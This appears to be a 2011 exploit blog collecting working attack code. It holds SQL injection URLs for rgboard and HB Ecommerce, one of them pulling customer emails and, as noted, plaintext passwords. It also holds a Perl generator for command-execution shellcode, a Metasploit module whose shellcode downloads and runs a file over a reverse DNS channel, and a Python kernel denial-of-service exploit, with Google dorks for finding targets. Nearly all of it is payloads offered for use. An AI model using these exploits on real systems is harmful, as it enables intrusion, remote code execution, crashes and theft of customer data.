
Wednesday, June 29, 2011

Rgboard SQL Injection Vulnerability

* Exploit Title: rgboard SQL Injection Vulnerability
 
* inurl: rgboard4/list.php
 
* Date: 2011. 6.22
 
* Author: (e-mail address obfuscated by the site's anti-spam script; not recoverable from this page)
 
* Tested on : Windows XP SP3
 
* Software Link: http://v4.rgboard.com/rg4_board/down.php?&bbs_code=rgboard_pds&bd_num=1757&key=0&mode=down
 
* Version: rgboard 4.2.1
 
* SQL Injection

    The `bbs_code` GET parameter of list.php reaches the SQL query without escaping or parameterisation, so a single quote terminates the string literal and the remainder of the parameter is executed as SQL:

    http://[target]/list.php?bbs_code=notice[SQL]
 
* POC (a single URL; it was line-wrapped in the original post):

    http://site/list.php?bbs_code=notice'+and+1=2+union+select+1%2C2%2C3%2C4%2C1%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2Cdatabase()%2C(select%20concat(0x2f,unhex(Hex(cast(user()%20as%20char)))))%2C30%2C31%2C32%2C33%2C34%2C35%2C6%2C5%2C4%2C3%2C2%23

    The `and 1=2` empties the legitimate result set so the UNION rows are displayed; `database()` and `user()` are placed in two of the selected columns, and the trailing `%23` (`#`) comments out the rest of the original query.

Friday, May 27, 2011



win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD
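#!/usr/bin/perl
#
# Title     : win32/xp sp3 Command Execution exploit/shellcode - 44 Bytes + CMD
# Author    : Tringle2011
# Platform  : win32
# Impact    : Command Execution / Shellcode maker
# Tested on : Windows XP SP3
#
# Prints a small C harness whose local buffer holds a 33-byte x86 stub followed
# by "cmd.exe /c <command>", and which then jumps into that buffer.  The harness
# therefore only works where the process stack is executable (DEP not enforced
# for the process).
#
# The stub is hard-wired to two absolute kernel32.dll addresses, 0x7c8623ad and
# 0x7c81cafa, which are only meaningful for the XP SP3 kernel32 build the
# author tested on.  From the calling pattern (push 0; push <string>; call ...)
# they are presumably WinExec and ExitProcess -- NOTE(review): confirm against
# the target's kernel32 before use.
#
# Size note: the stub stores a NUL at offset 0x29 (41) of the string
# ("\x88\x43\x29" = mov [ebx+0x29], al with eax = 0), i.e. right after the
# 11-byte "cmd.exe /c " prefix plus 30 bytes of command.  Longer commands are
# silently truncated; for shorter ones that store lands past the end of the C
# array (in practice harmless because the process exits right after).
#
# Fixes vs. the published version: the generated C was missing the ';' after
# the array initializer and did not compile; a command containing '"' or '\'
# broke the C string literal; the usage example (four words) contradicted the
# "exactly one argument" check.
use strict;
use warnings;

# Limits derived from the stub, see header comment.
use constant PREFIX_LEN  => length 'cmd.exe /c ';   # 11
use constant MAX_CMD_LEN => 0x29 - PREFIX_LEN;       # 30

# Non-interpolating q'' so the C escapes (\x.., \n) are emitted literally.
my $C_HEADER = q'
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(){
    
    unsigned char shellcode[]=
';

# 33 bytes of position-independent code followed by "cmd.exe /c "; the command
# is spliced in directly after the last byte and the literal is closed by
# build_source().
my $STUB_CODE = q'
"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x29\x53\xbb\xad\x23\x86\x7c".
"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20';

my $C_FOOTER = q'

    printf("Size = %d bytes\n", strlen(shellcode));
 
    ((void (*)())shellcode)();
 
    return 0;
}
';

# Return the full C source for the harness carrying $cmd.
# Backslashes and double quotes in $cmd are escaped so the C string literal
# stays well-formed.
sub build_source {
    my ($cmd) = @_;
    (my $literal = $cmd) =~ s/([\\"])/\\$1/g;
    return $C_HEADER . $STUB_CODE . $literal . q{";} . $C_FOOTER;
}

# Banner printed before the generated source.
sub logo {
    print q'
 Windows/32bit - Command Execution Exploit/ShellCode - 44 Bytes + CMD 
';
    return;
}

# Entry point: the command is taken from all arguments joined by spaces, so both
# `perl $0 "shutdown -s -t 18"` and `perl $0 shutdown -s -t 18` work.
sub main {
    my @args = @_;
    system('cls') if $^O eq 'MSWin32';    # clear screen; Windows-only command
    logo();
    if (!@args) {
        print "\n [!] Usage: perl $0 [Command] \n\n";
        die " [*] f.ex: perl $0 shutdown -s -t 18 \n";
    }
    my $cmd = join ' ', @args;
    if (length $cmd > MAX_CMD_LEN) {
        warn sprintf(
            " [!] Warning: command is %d bytes but the stub NUL-terminates after %d; the rest is ignored.\n",
            length $cmd, MAX_CMD_LEN);
    }
    print build_source($cmd);
    return;
}

main(@ARGV) unless caller;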



Download and execute file via reverse DNS channel
##
# Shellcode: download and execute a file via a reverse DNS channel
#
# Features:
# * Tested on Windows 7
# * Works with UAC enabled: the DNS requests are issued by svchost.exe on the
#   payload's behalf (the payload only calls getaddrinfo)
# * Firewall/router/NAT/proxy bypass as a reverse channel (like dnscat does,
#   but without sockets, and stable)
# * NO SOCKET is opened by the payload itself
#
# DNS handler - http://dsecrg.com/files/pub/tools/revdns.zip
# P.S. Works on Vista/7/2008.
#      Does not work on XP/2003 because IPv6 is not installed there by default;
#      it can work on XP/2003 if IPv6 is installed
#      (it does not need to be enabled, just installed).
 
require 'msf/core'
 
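module Metasploit3

    include Msf::Payload::Windows
    include Msf::Payload::Single

    # Single-stage x86 payload that, per the author's notes, fetches a file
    # through DNS lookups (getaddrinfo) instead of a socket, writes it to the
    # temp directory and runs it.  The 'Begin' blob carries a 0xFF-separated
    # string table of the APIs the stub resolves at run time (GetProcAddress,
    # GetTempPathA, WinExec, ExitThread, LoadLibraryA, ws2_32, WSAStartup,
    # getaddrinfo, msvcrt, fopen, fwrite, fclose); the tail of 'Payload2'
    # pushes "cmd /c \"", so the downloaded file is apparently run through
    # cmd.exe.  DOMAIN and FILE are spliced into fixed-width slots between the
    # blobs by generate_stage.
    def initialize(info = {})
        super(update_info(info,
            'Name'          => 'DNS_DOWNLOAD_EXEC',
            'Version'       => '0.01',
            'Description'   => 'Download and Exec (via DNS)',
            'Author'        => [ 'Alexey Sintsov' ],
            'License'       => MSF_LICENSE,
            'Platform'      => 'win',
            'Arch'          => ARCH_X86,
            'Payload'       =>
                {
                    'Offsets' =>{ },
                     
                    'Begin' => "\xeb\x02\xeb\x7A\xe8\xf9\xff\xff\xff\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\xFF\x47\x65\x74\x54\x65\x6d\x70\x50\x61\x74\x68\x41\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x69\x6E\x45\x78\x65\x63\xFF\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\xff\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\xFF\x77\x73\x32\x5f\x33\x32\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\xFF\x67\x65\x74\x61\x64\x64\x72\x69\x6e\x66\x6f\xFF\x6d\x73\x76\x63\x72\x74\xFF\x66\x6f\x70\x65\x6e\xFF\x66\x77\x72\x69\x74\x65\xFF\xEB\x13\x66\x63\x6c\x6f\x73\x65\xFF",
                     
                    'Payload1' =>            "\xFF\x5e\x33\xc9\xb1\xe4\x8b\xd1\x2b\xe2\x8b\xfc\xf3\xa4\x33\xc0\x8b\xfc\x8A\x04\x39\x3A\xCA\x74\x0D\x3C\xFF\x74\x03\x41\xEB\xF2\x88\x2C\x39\x41\xEB\xEC\xeb\x78\x31\xC9\x64\x8B\x71\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x5e\x08\x8B\x7E\x20\x33\xed\x83\xc5\x18\x8B\x36\x66\x39\x0C\x2F\x75\xed\x8B\x73\x3C\x8B\x74\x1E\x78\x03\xF3\x8B\x7E\x20\x03\xFB\x8B\x4E\x14\x33\xED\x56\x57\x51\x8B\x3F\x03\xFB\x8B\xF2\x6A\x0E\x59\xF3\xA6\x74\x08\x59\x5F\x83\xC7\x04\x45\xE2\xE9\x59\x5F\x5E\x8B\xCD\x8B\x46\x24\x03\xC3\xD1\xE1\x03\xC1\x33\xC9\x66\x8B\x08\x8B\x46\x1C\x03\xC3\xC1\xE1\x02\x03\xC8\x8B\x01\x03\xC3\x8B\xFA\x8B\xF7\x83\xC6\x0E\x8B\xD0\x6A\x04\x59\xC3\x8b\xd4\xe8\x81\xff\xff\xff\x50\x33\xc0\xb0\x0f\x03\xf8\x57\x53\xff\xd2\x50\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x0c\x50\x33\xc0\xb0\x08\x03\xf8\x57\x53\xff\x54\x24\x10\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x14\x50\x8b\xc7\x83\xc0\x0d\x50\xff\x54\x24\x04\x8b\xd8\x33\xc0\xb0\x14\x03\xf8\x57\x53\xff\x54\x24\x18\x50\x33\xc0\xb0\x0b\x03\xf8\x57\x53\xff\x54\x24\x1C\x50\x83\xc7\x0c\x57\xff\x54\x24\x0c\x8b\xd8\x83\xc7\x07\x57\x53\xff\x54\x24\x20\x50\x83\xc7\x06\x57\x53\xff\x54\x24\x24\x50\x50\x8b\xf4\x83\xc7\x09\x57\x53\xff\x54\x24\x2c\x50\x33\xc0\xb4\x03\x2b\xe0\x8b\xcc\x51\x50\xff\x56\x20\x03\xe0\x59\x59\x8b\xc8\xb8",
                     
                    'Payload2' =>    "\xba\x01\x01\x01\x01\x2b\xc2\x50\xb8\x79\x78\x6f\x2e\x50\x2b\xe1\x8b\xcc\x33\xc0\xb0\x77\xb4\x62\x50\x54\x51\xff\x56\x08\x33\xd2\xb6\x03\xb2\x0c\x03\xe2\x50\x33\xc0\xb4\x05\x2b\xe0\x54\x33\xc0\xb0\x02\xb4\x02\x50\xff\x56\x10\x32\xc9\x50\x80\xf9\x80\x74\x04\xfe\xc1\xeb\xf6\x83\xc4\x10\xb0\x06\x50\xb0\x01\x50\xb0\x17\x50\x83\xec\x04\x8B\xEC\x83\xC7\x07\x83\xEC\x20\x33\xC0\x8A\x0C\x38\x88\x0C\x04\x40\x84\xC9\x75\xF5\x33\xc0\xb9\x61\x61\x61\x61\x8b\xd9\x51\x8b\xd4\x83\xc2\x7f\x52\x33\xd2\x55\x52\x8b\xd4\x83\xc2\x0c\x52\xff\x56\x0c\x59\x51\x85\xc0\x75\xe7\x33\xDB\xB3\xee\x2B\xE3\x50\x8b\xc5\x8b\x40\x5b\x8b\x48\x18\x8b\x50\x1c\x83\xC1\x08\x33\xC0\x33\xFF\x66\x8B\x01\x66\x3d\xff\xff\x74\x7f\x8b\xf8\xc1\xef\x08\x32\xe4\x5b\x03\xfb\x57\x66\x8B\x59\x02\x66\x89\x5c\x04\x04\x8B\x79\x04\x89\x7C\x04\x06\x8B\x79\x08\x89\x7C\x04\x0A\x8B\x79\x0C\x89\x7C\x04\x0E\x8b\xc2\x85\xc0\x75\xbb\x58\xff\x76\xf8\x50\xb0\x01\x50\x8b\xc4\x83\xc0\x0c\x50\xff\x56\x04\x33\xc0\xb0\xee\x03\xe0\x58\x58\x58\x58\x58\x2D\x61\x61\x61\x61\xC0\xE4\x04\x02\xC4\x3C\xFF\x75\x13\x8A\xE0\x40\xc1\xe8\x10\x3c\x1a\x75\x04\xfe\xc4\x32\xc0\xc1\xe0\x10\xeb\x08\x40\x8a\xe0\xC0\xEC\x04\x24\x0F\x05\x61\x61\x61\x61\x50\xe9\x46\xff\xff\xff\x8b\x46\xf8\x50\xff\x56\xfc\x66\xb8\x22\x05\x03\xe0"+"\x68\x2f\x63\x20\x22\x68\x63\x6d\x64\x20\x8b\xcc\x41\x8a\x01\x84\xc0\x75\xf9\xc6\x01\x22\x88\x41\x01"+"\x33\xc0\x8b\xcc\x50\x51\xff\x56\x1c\x50\xff\x56\x18" 
                     
                }
            ))

        # The stub ends its own thread (author's note: rtlExitThread(0)), so the
        # generic EXITFUNC option would have no effect here.
        deregister_options('EXITFUNC')

        # DOMAIN is spliced into a 10-byte slot (see generate_stage); the author
        # documents 9 bytes as the maximum.  FILE now carries its documented
        # default instead of only mentioning it in the description.
        register_options(
            [
                OptString.new('DOMAIN', [ true, "The domain name to use (9 bytes - maximum)" ]),
                OptString.new('FILE', [ true, "Filename extension (default VBS)", 'vbs' ]),
            ], self.class)
    end

    #
    # Constructs the payload: Begin + "." + DOMAIN (0xFF-padded to 10 bytes)
    # + Payload1 + FILE (0x01-padded to 4 bytes, each real byte incremented
    # by one) + Payload2.
    #
    # Raises ArgumentError when DOMAIN or FILE would not fit its slot.  The
    # original padded to exactly these widths, which indicates the stub
    # addresses the fields at fixed offsets; emitting a longer field would
    # shift everything after it and produce a silently broken payload.
    #
    def generate_stage
        # Work on copies.  String#[]= below mutates in place and
        # datastore['FILE'] is the option's own string, so without dup every
        # call re-incremented the stored extension and the second generated
        # payload differed from the first.
        domain = (datastore['DOMAIN'] || '').dup
        extens = (datastore['FILE'] || 'vbs').dup

        if extens.length > 4
            raise ArgumentError, "FILE must be at most 4 characters (got #{extens.length})"
        end
        if domain.length > 10
            raise ArgumentError, "DOMAIN must be at most 10 characters (got #{domain.length})"
        end

        # Extension: pad with 0x01 to 4 bytes, then add 1 to each real
        # character.  Presumably the stub subtracts it back; the encoding
        # itself is not explained by the author.
        ext_len = extens.length
        extens << "\x01" while extens.length < 4
        ext_len.times do |i|
            extens[i, 1] = (extens[i].ord + 1).chr
        end

        # Domain: '.' prefix, then 0xFF (the string-table separator) padding
        # up to 10 bytes.
        domain << "\xFF" while domain.length < 10
        domain = "\x2e" + domain

        payload = module_info['Payload']['Begin'] + domain +
                  module_info['Payload']['Payload1'] + extens +
                  module_info['Payload']['Payload2']

        return payload
    end

end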



Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
#!/usr/bin/python
 
############################################################################
##
## Title: Microsoft Windows Vista/Server 2008 "nsiproxy.sys" Local Kernel DoS Exploit
## Vendor: www.microsoft.com
## Vulnerable: Windows Vista/Server 2008
##
############################################################################
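from ctypes import *

GENERIC_READ  = 0x80000000
GENERIC_WRITE = 0x40000000
OPEN_EXISTING = 0x3
CREATE_ALWAYS = 0x2

# Device symlink and the IOCTL code the PoC sends to nsiproxy.sys.
# Bytes (not str) so the call works on Python 3 as well; with a str argument
# ctypes would pass a wide string and the open would fail.
NSI_DEVICE = b"\\\\.\\Nsi"
NSI_IOCTL  = 0x12003f

# The 56-byte input buffer exactly as published.  Several dwords look like
# user-mode addresses taken from the author's process (0x016c8938, 0x0078fa10,
# 0x0078fa38) rather than portable values -- NOTE(review): the PoC does not say
# whether the crash depends on them; verify on a throwaway VM before relying on
# this as a reproducer.
NSI_REQUEST = (b"\x00\x00\x00\x00\x00\x00\x00\x00\xec\x2d\x39\x6e\x07\x00\x00\x00"
               b"\x01\x00\x00\x00\x00\x00\x00\x00\x38\x89\x6c\x01\x08\x00\x00\x00"
               b"\x00\x00\x00\x00\x00\x00\x00\x00\x10\xfa\x78\x00\x28\x00\x00\x00"
               b"\x38\xfa\x78\x00\x0c\x00\x00\x00")


def trigger(device=NSI_DEVICE, ioctl=NSI_IOCTL, request=NSI_REQUEST):
    """Open ``device`` and send ``request`` with control code ``ioctl``.

    Returns True if DeviceIoControl reported success, False otherwise (on a
    vulnerable host the machine bugchecks before this returns).  Raises
    OSError when the device cannot be opened; the original ignored the
    CreateFileA result and would have issued the IOCTL on an invalid handle.
    Windows only: ``windll`` does not exist elsewhere.
    """
    kernel32 = windll.kernel32
    # Keep the handle pointer-sized so 64-bit processes do not truncate it.
    kernel32.CreateFileA.restype = c_void_p
    INVALID_HANDLE_VALUE = c_void_p(-1).value

    # CREATE_ALWAYS is kept as published: device opens conventionally use
    # OPEN_EXISTING, but this disposition is what the author tested with.
    handle = kernel32.CreateFileA(device, GENERIC_READ | GENERIC_WRITE, 0, None,
                                  CREATE_ALWAYS, 0, None)
    if handle is None or handle == INVALID_HANDLE_VALUE:
        raise OSError("CreateFileA(%r) failed, error %d" % (device, GetLastError()))

    returned = c_ulong()
    try:
        # No output buffer is needed: the original passed an empty one.
        ok = kernel32.DeviceIoControl(c_void_p(handle), ioctl, request, len(request),
                                      None, 0, byref(returned), None)
        return bool(ok)
    finally:
        kernel32.CloseHandle(c_void_p(handle))


if __name__ == '__main__':
    print("DeviceIoControl returned %s" % trigger())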

HB ECOMMERCE SQL Injection Vulnerability


-------------[ HB ECOMMERCE SQL Injection Vulnerability ]---------------
------------------------------------------------------------------------
------------------------------------------------------------------------
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ]
[+] Google Dork: intext:'supplied by hb ecommerce'
[+] Date: 26.05.2011
[+] Author: Tringle2011
[+] Software Link: http://www.hbecommerce.co.uk/
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64
[+] System: PHP
------------------------------------------------------------------------
------------------------------------------------------------------------
vulnerable url:
 
/templates1/view_product.php?product=

Example:

http://localhost/templates1/view_product.php?product=[SQL INJECTION]

(The "=3D" shown in the original post is quoted-printable mangling of "=", not part of the URL.)
 
Retrieve an e-mail address from the customers table (error-based injection via the duplicate-key GROUP BY trick; the schema name `web34-hbecommerc` is the tested site's and must be adjusted per target):
 
http://localhost/templates1/view_product.php?product=94746%20AND%20%28SELECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%20LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20

Decoded: `94746 AND (SELECT 716 FROM(SELECT COUNT(*),CONCAT(CHAR(58,122,99,109,58),(SELECT MID((IFNULL(CAST(email AS CHAR),CHAR(32))),1,50) FROM `web34-hbecommerc`.customers LIMIT 5,1),CHAR(58,109,103,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)` - the selected value is returned inside the MySQL duplicate-entry error message.
 
note: customer passwords are stored in plaintext in the customers table, so the same query with `password` in place of `email` returns them directly.